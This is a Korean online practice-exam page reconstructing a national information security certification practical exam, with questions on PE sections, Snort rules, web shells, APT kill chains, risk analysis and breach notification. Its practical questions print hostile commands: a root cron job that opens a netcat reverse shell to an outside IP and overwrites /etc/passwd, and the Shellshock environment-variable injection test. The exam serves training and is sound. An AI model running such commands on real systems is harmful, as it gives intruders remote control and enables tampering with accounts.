정보보안기사 복구 문제의 한계 안내

정보보안기사 실기 7회

단답형


1. 윈도우 PE(Preinstallation Environment) IMAGE_SECTION_HEADER에는 각 세션들의 시작주소와 크기가 있다. 괄호안에 알맞은 용어를 넣으시오.
1) 실행 코드의 정보가 저장되는 영역
2) 전역변수, 상수의 정보가 저장되는 영역
3) DLL에서 가져온 함수 정보가 저장되는 영역
위키해설
클릭하면 보입니다.
  윈도우 PE
2. 익스플로잇과 관련된 다음 보기에 알맞은 용어를 넣으시오.
1) 실제로 기계어로 구성되어 Exploit의 본체에 해당하는 프로그램의 명칭은 무엇인가?
2) x86계열에서 NOP(No Operation) code를 hex로 표현함ㄴ 어느값인가?
3) x86계열에서 ESP에 들어있는 값을 EIP로 이동하는 어셈블리 코드를 적으시오.

3. 윈도우 DNS 서버에서 DNS 설정 시 두 가지 절차를 거친다. 보기에서 설명하는 절차를 적으시오.
1) 도메인 DNS서버를 등록하는 절차
2) DNS 서버에 서비스정보를 입력하는 절차
위키해설
클릭하면 보입니다.
  윈도우 DNS
4. Snort 정책에서 10바이트에서 12바이트 중 00FF 바이트에 해당하는 내용을 찾으려고 한다. 보기의 rule에 빈칸을 채워 rule을 완성하시오.
alert tcp any any (( A ):"|00FF|";( B ):9,( C ):2)
위키해설
클릭하면 보입니다.
  스노트
5. 다음에 해당하는 악성코드 분류에 대해 답하시오.
키로거는 사용자가 키보드로 PC에 입력하는 내용을 몰래 낚아채어 기록하는 행위를 말한다. 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적, 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재한다. 다음은 사용자 몰래 키로거를 설치할 수 있는 방법들이다. 어떤 방법들인가?

1) 사용자가 접속한 웹페이지에서 팝업, iframe, 리다이렉트 등을 통해 사용자가 인식하지 못하게 악성코드를 다운로드 시키는 침해유형을 말한다.
2) 정상 애플리케이션인 것처럼 배포된 뒤 자신의 내부에 압축해서 가지고 있던 코드를 이용하여 새로운 악성코드를 생성하여 시스템을 감염시킨다.
위키해설
클릭하면 보입니다.
  Drive-by Download드롭퍼
6. 네트워크 패킷을 분석할 수 있는 Wireshark에선 캡처된 파일에서 원하는 내용을 필터링하기 위한 디스플레이 필터(Display Filter)가 있다. 질의에 대한 응답 패킷만을 보기 위한 필터링 구문은?

7. 다음은 파일 업로드 공격에 대한 설명이다. 괄호안에 들어갈 말을 적으시오.
파일 업로드 취약점이 존재하는 경우 공격자가 웹서버에 명령을 수행할 수 있도록 작성한 (   괄호   )를 업로드하여 웹서버에 명령을 실행해 관리자 권한을 획득후 웹페이지 소스코드 열람, 서버 내 파일유형, 백도어 프로그램 설치등을 할수 있다.
위키해설
클릭하면 보입니다.
  웹셸
8. 다음 괄호 안에 알맞은 용어를 넣으시오.
APT는 지능형 지속공격으로 특정 회사의 중요 정보 획득, 정치적 목적,사이버 테러 등을 목적으로 하는 해커에 의해 사이트, 기업, 개인을 상대로 지속적으로 해킹하는 공격을 의미한다. 이에 대한 대비책인 (  괄호  ) 는 록히드마틴사가 정식 명칭을 특허로 등록하였다. 군사용으로 적 미사일 기지에 대한 선제공격을 의미하며, 사이버 공격에 대한 선제 대응책으로 사회적인 이슈로 대두되기도 하였다.
APT 공격의 경우 7단계의 (정찰->무기제작 배달->취약점 공격->설치->명령 및 제어 -> 표적대상행동) 공격을 진행한다. 특헝 기관을 노릴경우 대상이 무엇이든지 간에 조금씩 침투하여 공격을 감행하는 것이 특징이며, 이중 가장 취약한 절차에 대해서만 선제대응할 수 있다면 APT공격을 예방할수 있다는 것을 의미한다.
위키해설
클릭하면 보입니다.
  사이버 킬 체인
9. 다음은 위협 통제 시점에 따른 분류이다. 알맞은 용어를 넣으시오
1) 발생가능한 잠재적인 문제들을 식별하여 사전에 대응하기 위한 통제
2) 1번 통제를 우회하여 발생하는 위협을 찾아내기 위한 통제
3) 2번 통제에 따라 발견한 위협에 대처하거나 줄이는 통제

10. 다음에서 설명하는 것은?
개인정보처리자가 개인정보를 안전하게 관리하기 위하여 내부 의사결정 절차를 통하여 수립시행하는 내부기준을 말한다. 이 내부 계획에는 아래의 내용이 포함되어야 한다.

1. 개인정보관리책임자의 자격요건 및 지정에 관한 사항
2. 개인정보관리책임자와 개인정보취급자의 역할 및 책임에 관한 사항
3. 개인정보의 기술적·관리적 보호조치 이행 여부의 내부 점검에 관한 사항
4. 개인정보 처리업무를 위탁하는 경우 수탁자에 대한 관리 및 감독에 관한 사항
5. 개인정보의 분실·도난·누출·변조·훼손 등이 발생한 경우의 대응절차 및 방법에 관한 사항
위키해설
클릭하면 보입니다.
  내부 관리계획

서술형


11. 스머프(Smurf) 공격은 ICMP 프로토콜의 취약점을 이용한 서비스 거부 공격이다.
1) 공격 원리를 서술하시오.
2) 방화벽 없이 공격을 막을 수 있는 방법을 설명하시오.
위키해설
클릭하면 보입니다.
  스머프 공격
12. 정량적 위험 분석과 관련하여 아래 질문에 답하시오.
1) SLE이란 무엇인가?
2) SLE를 구하는 식을 적으시오.
3) ALE를 구할때 SLE를 제외하고 필요한 것은 무엇인가?
4) 연수익이 5천만원인 사이트 위험을 완전히 제거하는 비용이 연간 1억원이라고 할 때 이 사이트의 ROI는?
위키해설
클릭하면 보입니다.
  정량적 위험분석
13. 정보통신망 이용촉진 및 정보보호 등에 관한 법률에 따라 개인 정보 유출 사실을 안 때에는 지체없이 이용자에게 알려야 한다. 이때 알려야 할 사항 5가지를 기술하시오.
위키해설
클릭하면 보입니다.
  개인정보 유출 통지

실무형


14. 웹서버를 점검하던 중 cron에 새로운 작업이 등록된 것을 확인하였다. 다음 cron 작업들이 root권한으로 실행될 경우 발생할 수 있는 위험에 대해 설명하시오.
0 0 6 * *   root   /bin/cp   /tmp/passwd1   /etc/passwd
0 0 12 * *   root   /usr/bin/nc   10.10.10.10 80 -e /bin/bash

15. 보기의 명령은 CVE-2014-6271 취약점을 테스트해 볼 수 있는 예제이다. 이 취약점은 인터넷을 통해 간단한 명령만으로 시스템을 장악할 수 있는 심각한 취약점으로 NIST는 하트블리드보다 높은 위험 점수인 10점을 부여하였다. 아래 질문에 답하시오.
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
1) 이 취약점의 이름은? 2) 보기의 명령을 실행했을 때 취약점이 존재하는 경우와 존재하지 않는 경우의 결과를 설명하시오. 3) 결과가 나오는 이유에 대해 설명하시오.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
채점하기
hide
reset
타이머

모든 문제들의 저작권은 원저작권자에게 있습니다. 본 사이트는 웹상에 공개되어 있는 문제만 모아서 보여드립니다. 저작권 안내

copyright 2024 뉴비티::새로운 CBT 시스템 - newbt.kr 제휴 문의